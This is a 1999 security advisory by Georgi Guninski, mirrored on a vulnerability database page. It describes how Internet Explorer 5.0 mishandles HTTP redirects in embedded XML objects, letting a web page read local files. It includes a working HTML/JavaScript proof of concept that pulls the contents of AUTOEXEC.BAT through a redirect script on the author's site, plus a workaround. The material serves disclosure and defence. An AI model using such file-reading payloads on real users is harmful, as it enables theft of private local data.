Lucene search
K

ie50.xml.txt

🗓️ 23 Nov 1999 00:00:00Reported by Georgi GuninskiType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 23 Views

Internet Explorer 5.0 has serious security issues with HTTP redirects in XML objects allowing data access.

Code
`Disclaimer:  
The opinions expressed in this advisory and program are my own and not  
of any company.  
The usual standard disclaimer applies, especially the fact that Georgi  
Guninski is not liable for any damages caused by direct or indirect use  
of the information or functionality provided by this program.  
Georgi Guninski, bears NO responsibility for content or misuse of this  
program or any derivatives thereof.  
  
Description:  
  
Internet Explorer 5.0 under Windows 95 and WinNT 4.0 (guess other  
versions are affected) has security problems with HTTP redirects in XML  
objects. This allows at least:  
1) Reading any (local or nonlocal) XML file and any wellformed  
documents. With the growing influence of XML I consider this a serious  
problem.  
2) Reading parts of documents  
3) Checking for the existence of local files.  
I suppose reading of arbitrary files (not just XML) is also possible,  
but do not have the time to explore.  
  
Details:  
  
When one embeds a XML document in a HTML document IE 5.0 does not handle  
properly HTTP redirects  
and allows access to the DOM of the embeded XML document.  
  
The code is:  
----------------------------------------------------------------------------------------  
<object id="xm" type="text/xml"  
data="http://www.nat.bg/~joro/reject.cgi?autoexec" width=400 height=200>  
</object>  
<SCRIPT>  
function f()  
{  
s=xm.body.innerHTML;  
a=window.open();  
//alert(s);  
a.document.open();  
a.document.write("Here is a part of AUTOEXEC.BAT (the error message is  
normal):<BR>"+s);  
a.document.close();  
}  
setTimeout("f()",5000);  
</SCRIPT>  
----------------------------------------------------------------------------------------  
  
  
Workaround:  
Disable Active Scripting or Disable Script ActiveX Controls marked Safe  
for Scripting  
  
Demonstration is available at http://www.nat.bg/~joro/xmln.html  
  
Copyright 1999 Georgi Guninski  
  
Regards,  
Georgi Guninski  
http://www.nat.bg/~joro  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Nov 1999 00:00Current
7.4High risk
Vulners AI Score7.4
23